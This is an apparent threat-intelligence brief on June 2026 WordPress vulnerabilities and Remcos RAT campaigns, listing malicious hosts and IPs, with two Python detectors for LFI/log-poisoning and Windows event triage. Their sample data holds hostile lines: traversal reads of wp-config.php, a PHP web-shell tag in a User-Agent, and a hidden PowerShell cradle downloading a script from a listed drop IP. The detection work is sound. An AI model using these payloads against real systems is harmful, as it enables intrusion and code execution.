This 48-hour period (June 17-18, 2026) saw significant malicious activity centered on Remcos RAT distribution and widespread WordPress vulnerabilities. The threat landscape is dominated by 30 newly disclosed NVD vulnerabilities, including four critical-severity flaws (CVSS 9.8-10.0) affecting WordPress plugins and themes. Three of them enable unauthenticated arbitrary file upload or PHP object injection, providing immediate remote code execution pathways. Additionally, roughly 50 malicious URLs were identified distributing Remcos RAT and Mozi botnet malware, with threat actors heavily leveraging Cloudflare Workers infrastructure and URL-shortening services for payload hosting and command-and-control operations.
WordPress environments face exceptional risk due to multiple unauthenticated local file inclusion (LFI) vulnerabilities across 20+ themes and plugins, all rated HIGH severity (CVSS 8.1). Organizations running affected versions should prioritize immediate patching: these vulnerabilities require no authentication and lead to sensitive data exposure (for example the database credentials in wp-config.php) and, via log poisoning, potentially remote code execution. The Remcos RAT campaign demonstrates continued reliance on social engineering and compromised or abused legitimate infrastructure, including GitHub repositories and file-sharing services. Defenders should enhance monitoring of Windows event logs for suspicious process execution and file system activity, as highlighted in current DFIR best practices.
Four critical-severity vulnerabilities and 26 high-severity flaws affecting WordPress plugins and themes pose immediate exploitation risk
Unauthenticated arbitrary file upload vulnerability in WordPress & WooCommerce Scraper Plugin (<=1.0.7) allows attackers to upload malicious files and achieve remote code execution without authentication.
Subscriber-level accounts can upload arbitrary files in PT Luxa Addons (<=1.2.2), enabling authenticated users with low privileges to execute malicious code.
Unauthenticated PHP object injection in SeaFood Company theme (<=1.4) allows remote attackers to execute arbitrary code through deserialization of untrusted data.
Unauthenticated PHP object injection vulnerability in Hot Coffee theme (<=1.7) enables remote code execution through insecure deserialization.
Subscriber-level SQL injection in Events Schedule WordPress Calendar Plugin (<=2.7.2) allows authenticated users to extract sensitive database information.
Subscriber accounts can escalate privileges to administrator in Genemy theme (<=1.6.6), enabling full site compromise by low-privileged users.
20+ WordPress themes and plugins affected by unauthenticated LFI vulnerabilities (CVSS 8.1), enabling attackers to read sensitive files including wp-config.php and potentially achieve remote code execution through log poisoning (injecting PHP into a web-server log, for instance via the User-Agent header, and then including that log file through the vulnerable parameter).
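The LFI and log-poisoning pattern above is easy to spot in web-server access logs once request parameters are URL-decoded. The detector below is an added illustration, not code from this brief or from any of the affected projects: the log lines are constructed (documentation IP ranges, placeholder theme and plugin names), and the traversal, PHP-wrapper and log-path patterns are assumptions about how such bugs are typically probed rather than signatures taken from the advisories. It flags single requests and also correlates a PHP tag planted in a header with a later inclusion of a log file from the same source IP.

```python
"""Flag WordPress LFI probes and log-poisoning chains in combined-format access logs.

Added example (not the brief's or any plugin's code). Sample log lines are
constructed; detection patterns are assumptions, not vendor signatures.
"""
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample: one attacker (203.0.113.10) and one benign client.
SAMPLE_LOG = """\
203.0.113.10 - - [17/Jun/2026:10:01:02 +0000] "GET /wp-content/themes/example-theme/inc/render.php?file=../../../../wp-config.php HTTP/1.1" 200 3120 "-" "curl/8.0"
203.0.113.10 - - [17/Jun/2026:10:01:05 +0000] "GET /wp-content/plugins/example-plugin/view.php?template=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 980 "-" "curl/8.0"
203.0.113.10 - - [17/Jun/2026:10:01:09 +0000] "GET /index.php?x=1 HTTP/1.1" 200 512 "-" "<?php system($_GET['c']); ?>"
203.0.113.10 - - [17/Jun/2026:10:01:11 +0000] "GET /wp-content/themes/example-theme/inc/render.php?file=../../../../../var/log/apache2/access.log&c=id HTTP/1.1" 200 9001 "-" "curl/8.0"
198.51.100.7 - - [17/Jun/2026:10:02:00 +0000] "GET /wp-content/themes/example-theme/style.css HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
203.0.113.10 - - [17/Jun/2026:10:03:00 +0000] "GET /wp-content/plugins/example-plugin/view.php?template=php://filter/convert.base64-encode/resource=wp-config.php HTTP/1.1" 200 4000 "-" "curl/8.0"
"""

# Apache/nginx "combined" format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL = re.compile(r'\.\.[/\\]')                       # ../ or ..\ after decoding
WRAPPER = re.compile(r'^(php|data|expect|phar)://', re.I)  # stream wrappers used to read source
SENSITIVE = ('wp-config.php', '/etc/passwd', '/proc/self/environ')
LOG_PATHS = ('/var/log/', 'access.log', 'error.log')       # targets of a log-poisoning include
PHP_TAG = re.compile(r'<\?php|<\?=', re.I)                 # PHP planted in a logged header


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e) so filters see the real path."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target, ua, referer):
    """Return the set of suspicious traits of one request line."""
    _path, _, query = target.partition('?')
    tags = set()
    for _name, raw in parse_qsl(query, keep_blank_values=True):  # parse_qsl decodes once
        value = fully_decode(raw)
        if TRAVERSAL.search(value):
            tags.add('traversal')
        if WRAPPER.match(value):
            tags.add('php-wrapper')
        if any(s in value for s in SENSITIVE):
            tags.add('sensitive-file')
        if any(s in value for s in LOG_PATHS):
            tags.add('log-include')
    if any(PHP_TAG.search(field) for field in (ua, referer)):
        tags.add('php-in-header')
    return tags


def analyze(log_text):
    """Walk the log in order; returns (findings, ips_with_log_poisoning_chain)."""
    findings, poisoners, chains = [], set(), set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m['target'], m['ua'], m['referer'])
        if 'php-in-header' in tags:
            poisoners.add(m['ip'])          # step 1: PHP written into the log
        if 'log-include' in tags and m['ip'] in poisoners:
            tags.add('log-poisoning-chain')  # step 2: same IP includes the log
            chains.add(m['ip'])
        if tags:
            findings.append({'ip': m['ip'], 'ts': m['ts'],
                             'target': m['target'], 'tags': sorted(tags)})
    return findings, sorted(chains)


if __name__ == '__main__':
    hits, chain_ips = analyze(SAMPLE_LOG)
    for h in hits:
        print(h['ip'], h['ts'], ','.join(h['tags']), h['target'])
    print('log-poisoning chains from:', chain_ips)
```

Because the sample attacker first plants `<?php ... ?>` in the User-Agent and two seconds later includes `/var/log/apache2/access.log` through the same vulnerable `file=` parameter, the fourth request is tagged `log-poisoning-chain`; a bare traversal or `php://filter` read is reported on its own. Run it against a real log by replacing `SAMPLE_LOG` with the file contents; the single-pass, in-order design is what lets it correlate the two steps without a database.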
Widespread Remcos RAT malware distribution via compromised infrastructure, Cloudflare Workers, and URL shortening services
45+ malicious URLs identified delivering Remcos RAT through Cloudflare Workers domains (guilherme-telecomunicacoes2024.workers.dev, fsocietyandtools.workers.dev, yasminanthonyy.workers.dev), indicating abuse of a trusted serverless/CDN platform for payload hosting and delivery.
Multiple URL shortening services (as.al, masuk.to, cuth.me, lemon-kutt) used to obfuscate Remcos RAT delivery, likely part of phishing or malvertising campaigns targeting enterprise users.
Remcos malware samples hosted on GitHub repository (bhh545578-lab/asasasas), file-sharing service (filesco.lovestoblog.com), and compromised business website (acmgrupo.com), demonstrating threat actor adaptation to blend with legitimate traffic.
Three URLs distributing Mozi botnet malware (32-bit ELF MIPS binaries) from IP addresses 42.7.7.87 and 42.59.239.160, indicating continued targeting of routers and IoT devices for DDoS botnet recruitment.
Three URLs associated with ClearFake malware distribution using domains designed to impersonate legitimate update prompts, targeting users with fake browser update social engineering.
Threat actors increasingly leveraging legitimate cloud services and CDN infrastructure for malware distribution and C2 operations
Threat actors extensively abusing Cloudflare Workers serverless platform to host malware payloads, leveraging trusted domain reputation and global CDN for resilient distribution. Over 30 worker subdomains identified in this campaign.
Cloudflare R2 storage buckets (pub-14b7818eeed2473fb453a2385620ceb9.r2.dev, pub-ce54f1982e42425c94a1dd345decfbb9.r2.dev) hosting Remcos RAT payloads, demonstrating adversary exploitation of cloud object storage services.
IP address 66.63.170.33 hosting multiple Remcos RAT payloads and HTA files used for initial access; its minimal infrastructure footprint suggests either a dedicated drop server or a compromised legitimate host.
Windows event logging configuration critical for detecting and investigating modern attacks
New guidance emphasizes proper Windows event log configuration as a fundamental requirement for effective DFIR operations. Organizations should ensure comprehensive logging of process creation (Event ID 4688, with command-line auditing enabled so that the full process command line is recorded), PowerShell module and script block logging (Event IDs 4103 and 4104 respectively), and file system activity, to detect WordPress exploitation, Remcos RAT execution, and lateral movement.
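To show what those events buy a responder, here is an added triage script (not from the guidance the brief cites and not Remcos-specific tooling) that applies a few process-creation and script-block heuristics to exported 4688 and 4104 records. The records are constructed and use the real EventData field names (NewProcessName, ParentProcessName, CommandLine, ScriptBlockText); the HTA-from-remote-URL chain mirrors the initial-access pattern described above, with the brief's 66.63.170.33 used as the sample download host. The rules themselves (mshta.exe fetching a URL, hidden or encoded PowerShell, download cradles, Office spawning a script host) are my assumptions about what to look for, and one rule flags the logging gap that results when 4688 is enabled without command-line auditing.

```python
"""Triage exported Windows 4688 / 4104 events for HTA-to-PowerShell initial access.

Added example, not the cited guidance's code. Events below are constructed;
the heuristics are assumptions, not a vendor rule set.
"""
import base64
import re

SCRIPT_HOSTS = {'mshta.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe',
                'cscript.exe', 'cmd.exe', 'rundll32.exe', 'regsvr32.exe'}
OFFICE = {'winword.exe', 'excel.exe', 'outlook.exe', 'powerpnt.exe'}
URL_RE = re.compile(r'https?://\S+', re.I)
ENC_RE = re.compile(r'[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})', re.I)
HIDDEN_RE = re.compile(r'[-/]w(?:indowstyle)?\s+hidden', re.I)
CRADLE_RE = re.compile(r'DownloadString|DownloadFile|FromBase64String|Invoke-Expression'
                       r'|\bIEX\b|Net\.WebClient|Invoke-WebRequest', re.I)


def _enc(ps):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode('utf-16-le')).decode()


CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://66.63.170.33/s.ps1")'

# Constructed sample: Word opens an HTA from the drop host, the HTA launches hidden,
# encoded PowerShell, the script block is logged, plus one 4688 lacking a command line.
SAMPLE_EVENTS = [
    {'EventID': 4688, 'NewProcessName': r'C:\Windows\System32\mshta.exe',
     'ParentProcessName': r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE',
     'CommandLine': 'mshta.exe http://66.63.170.33/invoice.hta'},
    {'EventID': 4688, 'NewProcessName': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'ParentProcessName': r'C:\Windows\System32\mshta.exe',
     'CommandLine': 'powershell.exe -w hidden -enc ' + _enc(CRADLE)},
    {'EventID': 4104, 'ScriptBlockText': CRADLE},
    {'EventID': 4688, 'NewProcessName': r'C:\Windows\System32\svchost.exe',
     'ParentProcessName': r'C:\Windows\System32\services.exe', 'CommandLine': ''},
    {'EventID': 4688, 'NewProcessName': r'C:\Windows\System32\notepad.exe',
     'ParentProcessName': r'C:\Windows\explorer.exe',
     'CommandLine': r'"C:\Windows\System32\notepad.exe" notes.txt'},
]


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Return a finding per suspicious event: {'index', 'EventID', 'hits', 'decoded'}."""
    findings = []
    for i, ev in enumerate(events):
        eid, hits, decoded = ev.get('EventID'), [], None
        if eid == 4688:
            proc = basename(ev.get('NewProcessName', ''))
            parent = basename(ev.get('ParentProcessName', ''))
            cmd = ev.get('CommandLine') or ''
            if not cmd:
                hits.append('logging-gap:no-command-line')   # audit command line not enabled
            if proc == 'mshta.exe' and URL_RE.search(cmd):
                hits.append('mshta-remote-hta')
            if proc in ('powershell.exe', 'pwsh.exe'):
                if HIDDEN_RE.search(cmd):
                    hits.append('powershell-hidden-window')
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    hits.append('powershell-encoded-command')
                    if CRADLE_RE.search(decoded):
                        hits.append('download-cradle')
            if parent in OFFICE and proc in SCRIPT_HOSTS:
                hits.append('office-spawns-script-host')
            if parent == 'mshta.exe' and proc in SCRIPT_HOSTS:
                hits.append('mshta-spawns-script-host')
        elif eid == 4104 and CRADLE_RE.search(ev.get('ScriptBlockText', '')):
            hits.append('download-cradle')
        if hits:
            findings.append({'index': i, 'EventID': eid, 'hits': hits, 'decoded': decoded})
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_EVENTS):
        print(f['index'], f['EventID'], ', '.join(f['hits']), f['decoded'] or '')
```

The encoded-command decode is the step that matters: without it the second event is just "powershell.exe -enc <blob>", and the cradle pointing at the drop host only becomes visible in the 4104 script block, which is why the brief pairs 4688 with 4103/4104. The `logging-gap` hit on the svchost.exe record is the cheap self-check for whether command-line auditing is actually on; if every 4688 in an export trips it, the hunt rules above cannot fire and the configuration needs fixing before the investigation continues.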